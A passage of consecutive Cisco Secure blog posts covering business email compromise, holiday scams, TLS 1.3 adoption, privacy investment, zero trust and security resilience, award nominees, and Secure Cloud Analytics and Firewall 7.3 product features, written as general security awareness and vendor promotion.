Fernandez has had multiple roles with multiple structures at Cisco. As an intern, she was fully in person and shared desk space with other interns who collaborated on full stack engineering. While working in finance IT, Fernandez was hybrid and many of her colleagues were distributed among multiple offices. The pandemic began while she was in a DevOps role, forcing her to maintain boundaries around her work time while working fully remotely. In her current role working on Duo, Fernandez is completely remote but advocates for in-person events if possible, because “humans are social creatures who want to see each other’s faces in real life once in a while.”

For Aspinall, “when we did come back to the office, there was a bit of an adjustment period where you were overstimulated from the office.” He also wanted to ensure team members who were 100% remote were fully included. Now he sees that while half his team is fully remote and the other half is hybrid, “that doesn’t stop anyone from doing anything. All of our meetings feel the same. They’re all seamless.”

If you’re interested in joining our team from wherever you are in the world, check out our open roles.

 


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

Understanding Business Email Compromise to better protect against it

By Sergio Pinto

What is business email compromise?

Imagine this: Your CEO sends you an email asking for your help transferring $5,000 to a new vendor for an urgent project. You make the transfer, only to find out later that the email was actually from an imposter, and that money is now in the hands of cybercriminals. Oops, right? crickets

Business Email Compromise (BEC) is a type of cybercrime that involves compromising or imitating legitimate business email accounts to carry out fraudulent transactions or steal sensitive information. The goal of a BEC attack is typically to trick the victim into transferring money, clicking on a malicious link, or disclosing sensitive information such as login credentials. BEC attacks can have a devastating impact on organizations of all sizes and in all industries, making it essential for businesses to be aware of the threat, understand the business risk, and take the necessary steps to protect themselves.

According to the latest FBI IC3 report, BEC is “one of the most financially damaging online crimes” and in 2021 was accountable for $2.4 Billion in adjusted losses for businesses and consumers.

How does BEC work?

One of the most common types of BEC attacks is called impersonating or email spoofing. By pretending to be a trusted colleague or business partner to gain the victim’s trust, the attacker uses social engineering techniques to trick the victim into clicking on a link or attachment in an email that contains malware, takes the victim to a malicious website, and has them transfer funds or change payment information.

BEC attacks can be very sophisticated and are difficult to detect. Many times, what the end-user sees on their email client does not represent the true email address of that sender, or it shows one that has been spoofed.

Typically, the attacker tries to impersonate someone in the organization with enough authority to not be questioned about what he/she is asking to be done.

How can BEC attacks be prevented?

As with everything in security, to be able to succeed in stopping BEC attacks, additional security layers & techniques should be implemented. There are several options to mitigate or reduce the number of successful BEC attacks. Creating a list of the people who will be likely to be impersonated will provide the best results. Usually, with names from the CxO level, this is known as a High Impact Personnel list. It will be used along with other security analysis engines to make sure any impersonated/spoof emails, along with other threats, get stopped and will not reach the end user.

The Cisco Secure Email Threat Defense solution leverages hundreds of detection engines that utilize state-of-the-art artificial intelligence/machine learning and natural language processing to convict messages from the most creative attackers! On top of this, our customers can define their High Impact Personnel list, and together with the other detection engines, will be able to not only block malicious messages but also understand the reasons and categories of why a message is being convicted as malicious.

In summary, Business Email Compromise (BEC) is a serious threat to organizations of all sizes and in all industries. To protect against BEC attacks, businesses should implement multiple techniques including identifying their High Impact Personnel for their organization, educating employees about the threat, and relying on reporting to understand who is being targeted most frequently so their security policies can be adjusted.

See how Secure Email Threat Defense identifies specific business risk factors to protect your organization.


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

The Nominees for the 2023 Cybersecurity Defender of the Year Award in EMEA

By Cristina Errico

Cybersecurity professionals are often perceived as sole practitioners, plying their craft in dimly lit rooms. Nothing could be further from the truth, as one of the keys to being a successful cybersecurity professional is the ability to collaborate and, more importantly, to share knowledge as far and wide as possible.

At Cisco, we have formed the Cisco Insider Advocacy program, which consists of a global community of professionals passionate about working and spreading their knowledge with others. We celebrate these individuals’ efforts with annual awards in various disciplines and locales. In 2023, Cisco will recognize top advocates by region for the Global Advocate Awards. Our first event – highlighting Cisco customers from across the EMEA region – is around the corner. It all happens at Cisco Live in Amsterdam, in a live ceremony on February 8!

I am joined on the Advocate Awards judges’ panel by my colleagues, Cindy Valladares, Director of Brand Strategy and Customer Advocacy at Cisco Secure, Caroline Surujpaul, EMEA and European Marketing Director at Cisco Secure and Sarah Stephens, Senior Security Marketing Leader for EMEA at Cisco Secure. We are pleased to introduce the nominees for the Cybersecurity Defender of the Year Award in EMEA.

We have five distinguished nominees, and while we have yet to select a winner, you will see how each of their contributions to Cisco’s cybersecurity community raised our attention.

Nominees for 2023 EMEA Cybersecurity Defender of the Year

Alessandro Braga  – CDO, Talent Garden

Alessandro was featured in a recent successful case study about the Future of Work with Umbrella, as well as an earlier piece about simplified security using Cisco Meraki in Talent Garden.

Alessandro also authored a book about digital transformation long before it was a common buzzword. That is typical of Alessandro’s foresight, the ability to be proactive to changes before they are commonplace. He is indeed on the cutting edge.

Alessandro considers his involvement in the Advocacy community as “a very easy goal for me. First, because I’m very passionate about cybersecurity, and second because here I can find very valuable peers and professionals to share information with.” Alessandro’s abilities are borne from passion, drive, and adherence to a personal code of excellence; he learned security in a strictly hands-on style. He is also a member of Cisco’s “League of Cybersecurity Heroes.”

Christoffer Vargtass Hallstensen – Head of SOC, Norwegian University of Science and Technology

Christoffer, the newest Cisco Insider Advocacy community member, has gotten off to a brisk involvement with the group. He was recently featured in the case study “NTNU Supports a Diverse Academic and Research Community with Proactive Security,” which detailed how the Norwegian University of Science and Technology tackled the management of a dizzying 110,000 endpoints connecting to the university’s VPN.

Christoffer fully embraces the ideology of collaboration, mentioning that when he was seeking a security solution, “We didn’t want a vendor. We didn’t want a product. We wanted a partner to help us attack this large problem of cybersecurity.”  He also demonstrates a fervent dedication to sharing by authoring half a dozen works in the cybersecurity realm, ranging from scientific to academic articles. His involvement in the Insider Advocacy community has earned him a spot in Cisco’s “League of Cybersecurity Heroes.”

Mark Healey – Senior Cyber Security Engineer, South Yorkshire Police

Mark is one of the most erudite cybersecurity professionals one could meet. He has extensive educational credentials and enjoys sharing his knowledge, making him one of the Top 10 most engaged advocates of the Cybersecurity Channel within the Cisco Insider Advocates community.

Mark’s professional involvement extends beyond his local precinct, offering his knowledge of security best practices across the UK Policing community. In completing his most recent university degree, he authored a dissertation that “has led to an initiative to improve the security posture of my workplace.” Mark’s support to other Cisco customers has also led to his election as Vice-Chair of the Internet Society Cybersecurity Special Interest Group. He is also a member of Cisco’s “League of Cybersecurity Heroes.”

Luigi Vassallo – COO & CTO, Sara Assicurazioni

Luigi is a valuable member of the Insider Advocacy group and was recently featured in a video and written success story about Zero Trust and XDR.

Luigi is an agent of change who embraces the collaborative spirit of a true cybersecurity expert, as exemplified in his entire professional approach: “Since the infrastructure is now cloud-based, we had to change our mindset regarding cybersecurity as well. It was important to have the people, the process, the organisation, and the technology under the same security umbrella.”

When not working to ensure the security of the Sara Assicurazioni environment, Luigi has dedicated time to speaking at events, such as the “Experts Learning from Experts” global virtual session, a special virtual roundtable dedicated to Zero Trust and, last but not least, his presentation at Cisco Live Emea in Amsterdam about XDR and Zero Trust. His contributions to the Insider Advocacy platform reflect a tireless commitment to the cybersecurity community. Luigi is also a member of Cisco’s “League of Cybersecurity Heroes.”

Diego Zengin – Global CTO, Grupo Cosentino

Last year, Diego participated as speaker at the Tech Forum: Convergencia entre redes y seguridad. He will also be featured in a future ThreatWise TV – Cisco episode

Diego recognised early on that remote work would place his organisation outside the scope of their security and took proactive measures to meet the challenge. Part of his proactive approach is to freely communicate his ideas, leading to his involvement in the Insider Advocacy community. This has also earned him a place within Cisco’s “League of Cybersecurity Heroes.”

Diego’s view of working with Cisco’s products is summed up in a catchy phrase: “If it’s connected, it’s protected.” His involvement within the Insider Advocacy community makes us echo that sentiment by stating that he is connected, helping to keep everyone protected.

Supporting Diversity, Equity, and Inclusion

One point of note is the absence of women from the list of nominees. This was not the result of bias, as Cisco has a history of substantial diversity, equity, and inclusion.  As you can see from the activities of the current nominees, the selection was based strictly on contributions to the community. We would love to see more engagement and membership in the Insider Advocacy program, not only from women but from a broader geographic area. This would increase the choices of possible nominees and add an even wider palette of inclusion to the entire nomination process.

We know that there is an entire population of cybersecurity professionals who seek more connection with like-minded individuals, and we welcome you to join this cohesive community.

Join Cisco’s most strategic, forward-thinking customer and partner advocates so
we can feature your story of passion and commitment on our next nomination list!

Cisco Insider Advocacy

 


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

Encryption is on the Rise!

By Justin Buchanan

When the Internet Engineering Task Force (IETF) announced the TLS 1.3 standard in RFC 8446 in August 2018, plenty of tools and utilities were already supporting it (even as early as the year prior, some web browsers had implemented it as their default standard, only having to roll it back due to compatibility issues. Needless to say, the rollout was not perfect).

Toward the end of 2018, EMA conducted a survey of customers regarding their TLS 1.3 implementation and migration plans. In the January 2019 report, EMA concluded:

Some participants’ organizations may find they have to go back to the drawing board and come up with a Plan B to enable TLS 1.3 without losing visibility, introducing unacceptable performance bottlenecks and greatly increasing operational overhead. Whether they feel they have no choice but to enable TLS 1.3 because major web server and browser vendors have already pushed ahead with it or because they need to keep pace with the industry as it embraces the new standard is unclear. What is clear is that security practitioners see the new standard as offering greater privacy and end-to-end data security for their organizations, and that the long wait for its advancement is over.

When EMA asked many of the same questions in an updated survey of 204 technology and business leaders toward the end of 2022, they found that nearly all the conclusions in the 2018/2019 report still hold true today. Here are the three biggest takeaways from this most recent survey:

  • Remote work, regulatory and vendor controls, and improved data security are drivers. With all the attention paid to data security and privacy standards over the past few years, it is little wonder that improved data security and privacy were primary drivers for implementation – and those goals were generally achieved with TLS 1.3. The push for remote working has also increased TLS 1.3 adoption because security teams are looking for better ways for remote workers (76% using) and third-party vendors (64% using) to access sensitive data.
  • Resource and implementation costs are significant. Eighty-seven percent that have implemented TLS 1.3 require some level of infrastructure changes to accommodate the update. As organizations update their network infrastructure and security tools, migration to TLS 1.3 becomes more realistic, but it is a difficult pill to swallow for many organizations to revamp their network topology due to this update. Over time, organizations will adopt TLS 1.3 for no other reason than existing technologies being depreciated – but that continues to be a slow process. There is also a real consideration about the human resources available to implement a project with very little perceived business value (81%), causing workload increases to thinly stretched security staff. Again, this will likely change as the technology changes and improves, but competing business needs will take a higher priority.
  • Visibility and monitoring considerations remain the biggest obstacle to adoption. Even with vendor controls and regulatory requirements, many organizations have delayed implementing TLS 1.3 for the significant upheaval that it would cause with their security and monitoring plans within their environment. Even with improved technologies (since the first announcement of TLS 1.3), organizations still cannot overcome these challenges. Organizations are evaluating the risks and compensating controls when it comes to delaying the implementation, and they continue to evaluate stop-gap solutions that are easier and less intrusive to implement than TLS 1.3 while road-mapping their eventual TLS 1.3 migration.

While regulatory frameworks and vendor controls continue to push the adoption of the TLS 1.3 standard, adoption still comes with a significant price tag – one that many organizations are just not yet ready or able to consume. Technology improvements will increase rates of adoption over time, such as Cisco Secure Firewall’s ability to decrypt and inspect encrypted traffic. More recent and unique technologies, like Cisco’s encrypted visibility engine, allow the firewall to recognize attack patterns in encrypted traffic without decryption. This latter functionality preserves performance and privacy of the encrypted flows without sacrificing the visibility and monitoring that 94% of respondents were concerned about.

Readers wishing to read the full EMA report can do so here and readers wishing to learn more about Cisco Secure Firewall’s encyrpted visibility engine can do so here.


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

Realizing the Value of Privacy Investment

By Harvey Jang

It’s been my pleasure to work alongside the Centre for Information Policy Leadership (CIPL) for over a decade to advocate for privacy to be respected as a fundamental human right and managed by organizations as a business imperative. CIPL works with industry leaders, regulators, and policymakers to deliver leading practices and solutions for privacy and responsible data use around the world.

Our organizations share the belief that privacy is key to trust and provides a critical competitive advantage for those who get it right. As privacy professionals, we live and breathe the importance of privacy every day and understand its value. We must help business leaders and other key stakeholders recognize and realize data privacy’s true worth and invest appropriately — beyond just meeting legal or compliance requirements.

We’re excited today to share this new, jointly-published research report Business Benefits of Investing in Data Privacy Management Programs. This report offers insights into the material business benefits that organizations are realizing from the time, monetary, and resource investments they have applied to building their Data Privacy Management Programs (DPMPs).

Here are some of the key findings:

Customers want accountability. While organizations are expected to meet their legal, compliance, and data security requirements, customers also demand organizations to be responsible stewards of their personal data. DPMPs not only enable organizations to gain a competitive edge, they empower them to earn and grow confidence and trust in the business.

Significant benefits from investing in DPMPs. Risk mitigation and compliance benefits, like avoiding regulatory scrutiny and fines, minimizing breaches, and evading damage to reputation, are among the most substantial benefits experienced by organizations that implement a DPMP. Other tangible benefits include greater agility, operational efficiency, and making the organization more attractive to investors.

Strong, attractive returns from DPMPs. More than half of organizations surveyed experienced at least $1 million in benefit from investing in privacy over the past year, with 28% realizing over $10 million in benefit.

Widespread Use of Privacy Maturity Models. Most organizations are using some form of a privacy maturity model to show accountability, including the CIPL Accountability Framework, ISO standards, Generally Accepted Privacy Principles, and the NIST Privacy Framework, among others. And CIPL members had an average score of 4.13 out of 5 with respect to implementing the seven elements of organizational accountability as described in the report.

There is considerable interest in further understanding the value DPMPs bring to their organization. Discussions about privacy and how DPMPs positively impact organizations will continue to be an increasing area of focus for corporate leadership, including the C-suite and at the Board level.

These findings offer valuable information and perspective for those building and operationalizing privacy. We’ll continue to research and share other qualitative and quantitative evidence that highlights privacy’s growing priority and value for organizations and the individuals they serve.

Check out this report Business Benefits of Investing in Data Privacy Management Programs and more related privacy research on consumer and organizational perspectives on the Cisco Trust Center.


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

Achieving Security Resilience: Findings from the Security Outcomes Report, Vol 3

By Lothar Renner

I am excited to announce the release of Cisco’s annual flagship cybersecurity report, the Security Outcomes Report, Volume 3: Achieving Security Resilience. It’s about preparing, adapting, and overcoming security challenges and threats, and an organisation’s ability to respond and emerge stronger.It’s the organization’s ability to respond to the inevitable attacks and unexpected events that come our way. In a recent webinar on Security Trends for 2023, the team spoke about laying a good foundation, and when you do, good outcomes will come from that. The Security Outcomes Report, Vol.3 looks at the most important factors that will help you build that foundation and give you the most successful security outcomes.

An EMEA perspective

When it came to the top priority security outcome for organisations, Europe, the Middle East and Africa (EMEA) were in line with global findings. Preventing major security incidents and losses, mitigating financial losses from security incidents, and adapting to unexpected external change events or trends, were the top three. Interestingly, security leaders prioritised mitigating financial losses whereas more technical and operational security respondents placed the highest importance on preventing major incidents. It’s of course understandable to have differing focuses at different levels but this highlights the importance of agreeing and communicating shared objectives and goals.

When asked to their rate overall resilience, respondents from France had the highest score in EMEA, closely followed by Italy and the Netherlands. Germany had the lowest score (significantly lower than the rest of region and the globe). Slightly contrary to this, when asked how confident they would be to remain resilient in a ‘worst case’ cybersecurity event, France came out second to last with only 27% saying they are strongly confident. The most confident country is the Netherlands with 54%.

Globally across all sizes of business the security outcome that organizations most struggle with is recruiting and retaining talented security personnel; the UK and Germany also noted this as top, reinforcing the ongoing battle against the security skills gap.

Seven success factors

The report analyses the seven success factors that have shown to improve overall security resilience:

  1. Establishing executive support can increase security resilience by 39%.
  2. Cultivating a culture of security boosts security resilience by 46%.
  3. Holding resources in reserve (don’t max out or overwork your staff) can increase it by up to 15%.
  4. Simplifying hybrid cloud environments makes an 18% difference over complex ones. ​
  5. Maximizing zero trust adoption can lead to 30% gains.​
  6. Extending detection and response capabilities show 45% better resilience scores.
  7. Taking security to the edge improves resilience by 27%.

I’d encourage you to read the full report, there are some great takeaways on how organizations can improve their resilience with a focus on these areas.

About the Security Outcomes Report

The report is based on an anonymous survey 4,751 active cybersecurity experts from 26 countries. Analysis was done by the Cyentia Institute on behalf of Cisco. EMEA countries represented are France, Germany, Italy, Saudi Arabia, Spain, The Netherlands and the UK.

The report is available in English, German and French.

To learn more about the findings from this report and the Duo Trusted Access Report, join our webinar: Trust No One – Secure Everyone: EMEA insights into a Zero Trust approach


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

Why Zero Trust Helps Unlock Security Resilience

By Richard Archdeacon

Speaking to many CISOs, it’s clear that many security executives view zero trust as a journey that can be difficult to start, and one that even makes identifying successful outcomes a challenge. Simultaneously, the topic of security resilience has risen up the C-level agenda and is now another focus for security teams. So, are these complementary? Or will they present conflicting demands that will disrupt rather than assist the CISO in their role?

One of the most striking results coming from Cisco’s latest Security Outcomes Report is that organizations with a mature zero trust implementation – those with basic controls, constant validation and automated workflows – experience a 30% improvement in security resilience compared to those who have not started their zero trust journey. So, these two initiatives – implementing zero trust and working to achieve security resilience – appear to complement each other while supporting the CISO when a cyber black swan swims in.

Security resilience is the ability to withstand an incident and recover more strongly. In other words, ride out the storm and come back better. Meanwhile, zero trust is best known as a “never trust, always verify” principle. The idea is to check before you provide access, and authenticate identity based on a risk profile of assets and users. This starts to explain why the two are complementary.

Cisco Security Outcomes Report: Resilience Outcomes - Ranked by Importance

The top security resilience outcomes

The Security Outcomes Report summarizes the results of a survey of more than 4,700 security professionals. Among the insights that emerge are nine security resilience outcomes they consider most important. The top three outcomes for resilience are prevention, mitigation and adaptation. In other words, they prioritize first the ability to avoid an incident by having the right controls in place, then the ability to reduce and reverse the overall impact when an incident occurs, and then the ability to pivot rapidly without being bound by too rigid a set of systems. Zero trust will support these outcomes.

Preventing, or reducing the likelihood of a cybersecurity incident, is an obvious first step and no surprise as the most important outcome. Pursuing programs that identify users and monitor the health of devices is a crucial a preventative step. In fact, simply ensuring that multifactor authentication (MFA) is ubiquitous across the organization can bring an 11% improvement in security resilience.

When incidents occur, security teams will need a clear picture of the incident they are having to manage. This will help in them respond quickly, with a proactive determination of recovery requirements. Previous studies show that once a team achieves 80% coverage of critical systems, the ability to maintain continuity increases measurably. This knowledge will also help teams develop more focused incident response processes. A mature zero trust environment has also been found to almost double a team’s ability to streamline these processes when compared to a limited zero trust implementation.

Communication is key

When talking to CISOs about successful implementation programs, communication within the business emerges as a recurring theme. Security teams must inform and guide users through the phases of zero trust implementation, while emphasizing the benefits to them. When users are aware of their responsibility to keep the organization secure, they take a participatory role in an important aspect of the business. So, when an incident occurs, they can support the company’s response. This increases resilience. Research has shown that a mature program will more than double the effect of efforts to improve the security culture. Additionally, the same communication channels established to spread the word of zero trust now can be called upon when an incident requires immediate action.

Mature implementations have also been seen to help increase cost effectiveness and reduce unplanned work. This releases more resource to cope with the unexpected – another important driver of resilience surfaced in Volume 3 of the Security Outcomes Report. Having more efficient resources enables the security function to reallocate teams when needed. Reviewing and updating resource processes and procedures, along with all other important processes, is a vital part of any of any change initiative. Mature zero trust environments reflect this commitment continuous assessment and improvement.

Adapt and innovate

Inherent in organizational resilience is the ability to adapt and innovate. The corporate landscape is littered with examples of those who failed to do those two things. A zero trust environment enables organizations to lower their risk of incidents while adapting their security posture to fit the ongoing changes of the business. Think of developing new partners, supporting new products remotely, securing a changing supply chain. The basic tenets of MFA – including continuous validation, segmentation and automation – sets a foundation that accommodates those changes without compromising security. The view that security makes change difficult is becoming obsolete. With zero trust and other keys to achieving security resilience, security now is a partner in business change. And for those CISOs who fear even starting this journey, understanding the benefits should help them take that first step.

Download the Security Outcomes Report, Vol. 3: Achieving Security Resilience today.

Learn more about cybersecurity research and security resilience:


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

Secure Email Threat Defense: Providing critical insight into business risk

By Kevin Potts

Attackers specifically craft business email compromise (BEC) and phishing emails using a combination of malicious techniques, expertly selected from an ever-evolving bag of tricks. They’ll use these techniques to impersonate a person or business that’s well-known to the targeted recipient and hide their true intentions, while attempting to avoid detection by security controls.

As a result of the requisite expertise needed to combat these complex attacks, email security has traditionally been siloed away in disparate teams and security controls. Practitioners are buried under an ever-growing pile of RFCs, requiring extensive domain-specific knowledge, unending vigilance, and meticulous manual interventions, such as tweaking trust levels and cultivating allow/block lists with IPs, domains, senders, and vendors.

Cisco Secure Email Threat Defense is leading the industry forward with a major shift, elevating email security into a new era; where administration will consist of merely associating specific business risks with the appropriate due diligence response required to remediate against them.

Email Threat Defense has introduced a new Threat Profile that provides the customer with deep insights into the specific business risks of individual email threats and the confidence to act quickly. This new visualization is powered by a new patent-pending threat detection engine. This engine leverages intelligence distilled from Talos global-scale threat research across a massive volume of email traffic into machine learning, behavioral modeling, and natural language understanding.

The detection engine granularly identifies specific underlying threat techniques utilized in the message by the attacker. The identified techniques provide the full context of the threat message as the supporting foundation for the engine to determine threat categorization and the specific risk to the business. These malicious Techniques, together with the threat category and specific business risk, are used to populate the Threat Profile.

Each message’s Threat Profile is identified in real-time, automatically remediated per policy, and surfaced directly to the operator in the message detail views, providing deep contextual insights into the attacker’s intent and the associated risks to the business. As part of a larger Extended Detection and Response (XDR) strategy, the actionable intelligence in Email Threat Defense is integrated with the wider enterprise orchestration of security controls via SecureX, easing the operational burden by decreasing your mean time to remediation (MTTR).

Email Threat Defense delivers a distinct understanding of malicious messages, the most vulnerable targets within the organization, and the most effective means of protecting them from phishing, scams, and BEC attacks. With a clean design and core focus on simplifying administration, Email Threat Defense deploys in minutes to strengthen protection of your existing Microsoft 365 Exchange Online platform against the most advanced email threats.

For more information, visit the Cisco Secure Email product pages, read the Email Threat Defense data sheet, and view the demo video below.

 


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

Oh, the scammers online are frightful

By Dave Lewis

Oh, the scammers online are frightful, and the deals they offer seem delightful. No matter what you think you know, let it go, let it go, let it go (to the tune of 1945’s Let it Snow by Vaughn Monroe with the Norton Sisters).

‘Tis the season to find ourselves awash in good tidings and, well, consumerism. While it’s only partly tongue in cheek, we must be honest with ourselves. We spend a lot of money online. Often, we find ourselves leaving things to the last minute and hope that the delivery folks can make the magic happen and send us all the widgets and grapple grommets while we surf the Internet from the safety of our sofas with coffee in hand.

But, not every deal is what it appears to be. Scammers are always lurking in the void of the Internet waiting for a chance to fleece the unexpecting from their hard-earned money. This can manifest itself to the unsuspecting in many ways. There are shipping frauds, gift card giveaways and vishing (phone-based scams).

Scams tend to rely on generating a false sense of urgency. The shipping scam emails often show up in our inboxes as a warning about a missed or delayed package that will be sent back to the point of origin if we don’t answer quickly. Of course, this requires a payment to receive the fictitious package.

These types of shipping scam emails are quite effective this time of year when more often than naught many people have enough orders coming to their house to make a fort with the empty boxes.

The other kinds of attacks are the gift card scams and vishing. The first of which taps into the sense of excitement that a person might receive something for free. “Fill out this form with your credit card information for a chance to win a $200 gift card.” Sadly, this attack works well for older generations  for which giveaways were more common and they aren’t as accustomed to spotting digital swindlers.

The last scam that we will tackle here is often labeled as vishing or voice phishing. This is a method whereby the attackers call a victim and attempt to convince their target that they need to do something which will lead to the exposure of financial information while pressuring the victim to think if they don’t act quickly that they will miss an opportunity for personal gain.

Unfortunately, the aforementioned scams really bring in a lot of return for the criminal element. In 2021, over 92,000 victims over the age of 60 reported losses of $1.7 billion. This represents a 74 percent increase in losses over losses reported in 2020.

One additional scam that plays on the heart strings is the romance scams. A lot of single people find themselves lonely during the holidays and can be manipulated into thinking that they’ve found a romantic match. But this can drain the bank accounts as well.

In 2021, the IC3 received reports from 7,658 victims who experienced over $432 million in losses to Confidence Fraud/Romance scams. This type of fraud accounts for the highest losses reported by victims over the age of 60.

All these attacks prey on people’s emotional responses. So, how do we prepare ourselves? We need to make knowledge a capability and arm ourselves with information that will help us avoid being taken advantage of by criminals.

Passwords are a significant exposure. They are the digital equivalent of a house key. A password will work for anyone that has access to it. We need to utilize technologies such as multi-factor authentication (MFA) on websites where it is possible to do so. So even if bad actors have our password, the victim still needs to approve the login.

If we don’t have the option to use MFA it would be an excellent idea to make use of a password manager. This is a way to safely store passwords and not fall into the trap of reusing passwords on multiple sites. Attackers bank on human nature and if we use the same credentials on multiple sites there is a high possibility that the criminals could gain access to other sites if they compromise just one.

I’m usually one to eschew the practice of New Year’s resolutions but I’ll make an exception. Keep a keen sense about yourselves whenever you receive an email or SMS that you were not expecting. If a deal is too good to be true then, well, it most likely is a scam. If you’re in doubt, try to look up the phone number, email address, person or “organization” offering the “deal.” More often than not, you’ll find lots of people reporting that it’s a scam.

Rather than being visited by the three ghosts of holiday scams, make sure you and your loved ones are prepared for a happy holiday and a prosperous New Year.


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

Cisco Secure Cloud Analytics – What’s New

By Claudio Lener

Nowadays, “cybersecurity” is the buzzword du jour, infiltrating every organization, invited or not. Furthermore, this is the case around the world, where an increasing proportion of all services now have an online presence, prompting businesses to reconsider the security of their systems. This, however, is not news to Cisco, as we anticipated it and were prepared to serve and assist clients worldwide.

Secure Cloud Analytics, part of the Cisco Threat, Detection, and Response (TD&R) portfolio, is an industry-leading tool for tackling core Network Detection and Response (NDR) use cases. These workflows focus primarily on threat detection and how security teams may recognize the most critical issues around hunting and forensic investigations to improve their mean-time-to-respond.

Over the last year, the product team worked tirelessly to strengthen the NDR offering. New telemetry sources, more advanced detections, and observations supplement the context of essential infrastructure aspects as well as usability and interoperability improvements. Additionally, the long-awaited solution Cisco Telemetry Broker is now available, providing a richer SecOps experience across the product.

MITRE ATT&CK framework alerting capabilities

As part of our innovation story on alerting capabilities, Secure Cloud Analytics now features new detections tied to the MITRE ATT&CK framework such as Worm Propagation, Suspicious User Agent, and Azure OAuth Bypass.

Additionally, various new roles and observations were added to the Secure Cloud Analytics to improve and change user alerts, that are foundational pieces of our detections. Alerts now include a direct link to AWS’ assets and their VPC, as well as direct access to Azure Security Groups, enabling further investigation capabilities through simplified workflows. In addition, the Public Cloud Providers are now included in coverage reports that provide a gap analysis to determine which accounts are covered. Alert Details offers new device information, such as host names, subnets, and role metrics that emphasize detection techniques. To better configure alerts, we are adding telemetry to gain contextual reference on their priority. Furthermore, the ingest process has grown more robust due to data from the Talos intelligence feed and ISE.

NDR: A Force Multiplier to Cisco XDR Strategy

The highly anticipated SecureX integration is now available in a single click, with no API credentials required and smooth interaction between the two platforms. Most importantly, Secure Cloud Analytics alerts may now be configured to automatically publish as incidents to the SecureX Incident Manager. The Talos Intelligence Watchlist Hits Alert is on by default due to its prominence among the many alert types.

Among other enhancements to graphs and visualizations, the Encrypted Traffic widget allows for an hourly breakdown of data. Simultaneously, the Device Report contains traffic data for a specific timestamp, which may be downloaded as a CSV. Furthermore, the Event Viewer now displays bi-directional session traffic to provide even more context to Secure Cloud Analytics flows, as well as additional columns to help with telemetry log comprehension: Cloud Account, Cloud Region, Cloud VPC, Sensor and Exporter.

New Sensor Data to Quickly Detect and Hunt Threats

On-premises sensors now provide additional telemetry on the overview page and a dedicated page where users can look further into the telemetry flowing through them in Sensor Health. To optimize the Secure Cloud Analytics deployment and improve the user experience, sensors may now be deleted from the interface.

Regarding telemetry, Cisco Telemetry Broker can now serve as a sensor in Secure Cloud Analytics, so users can identify and respond to threats faster with additional context sent to Secure Cloud Analytics. In addition, there will soon be support for other telemetry types besides IPFIX and NetFlow.

As we can see from the vast number of new additions to Secure Cloud Analytics, the product team has been working hard to understand the latest market trends, listen to the customers’ requests, and build one of the finest SaaS products in the NDR industry segment. The efforts strongly underline how Secure Cloud Analytics can solve some of the most important challenges in the NDR space around visibility, fidelity of alerts and deployment complexity by providing a cloud hosted platform that can offer insights on-premise and on cloud environments simultaneously from the same dashboard. Learn more about new features that allow Secure Cloud Analytics to detect, analyze, and respond to the most critical dangers to their company much more quickly.


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

Introducing Secure Firewall version 7.3

By Ashley Pilbeam

Introduction to Cisco Secure Firewall 7.3

Cisco’s latest release of the Secure Firewall operating system, Secure Firewall Threat Defense Version 7.3, addresses key concerns for today’s firewall customers. The 7.3 release delivers more features to the three key outcomes: see and detect more threats faster in an increasingly encrypted environment, simplify operations, and lower the TCO of our security solution.

See More – Detect Faster

QUIC Fingerprinting

The QUIC protocol is seeing significant adoption but seeing within QUIC is highly challenging. It is the default protocol for popular sites such as Google and Facebook, almost 10% of sites today now support transport over the QUIC protocol. Further enhancements to Cisco’s Encrypted Visibility Engine (EVE), first launched a year ago in 7.1, allows for the fingerprinting of traffic that is using the QUIC Protocol in Secure Firewall 7.3. This allows for enhanced visibility of this traffic for use in policy decisions to help determine the nature of the traffic and identify potential malicious traffic hiding in the QUIC Protocol.

MITRE Rule Groups

The Intrusion Prevention System (IPS) in Secure Firewall 7.3 now includes groups of rules mapped to the MITRE framework so that customers can both deploy explicit protections and see events mapped to those known attackers’ tactics and techniques. Additionally, the reporting and eventing capabilities have been enhanced to show any events that map to specific tactics as described by MITRE.

Remote Access VPN Dashboard

Remote work is here to stay. Hybrid work is the new normal, to complement our best-in-class Remote Access VPN Capabilities inside Cisco Secure Firewall, release 7.3 delivers a consolidated dashboard for monitoring the Remote Access infrastructure. The new dashboard capabilities consolidate existing and new information into a single location so that customers can track logged in users, failed attempts to connect, location that users are connecting from as well as insights on throughput and bandwidth usage, providing customers with the security and business visibility they need to manage Remote Access VPN capabilities regardless of scale.

Easy Ops

Enhanced Cluster Capabilities

Clustering capabilities within Secure Firewall offer a powerful way to scale out for performance and resiliency. With the release of Secure Firewall 7.3, operational enhancements to the clustering solution have been added so that customers can now monitor the full suite of metrics relating to the health of their cluster directly from the Secure Firewall Management Center as well as the capability to perform backup and restore actions on cluster nodes for a significantly reduced time-to-recovery in the event of a failure

Additional Site-To-Site VPN Capabilities

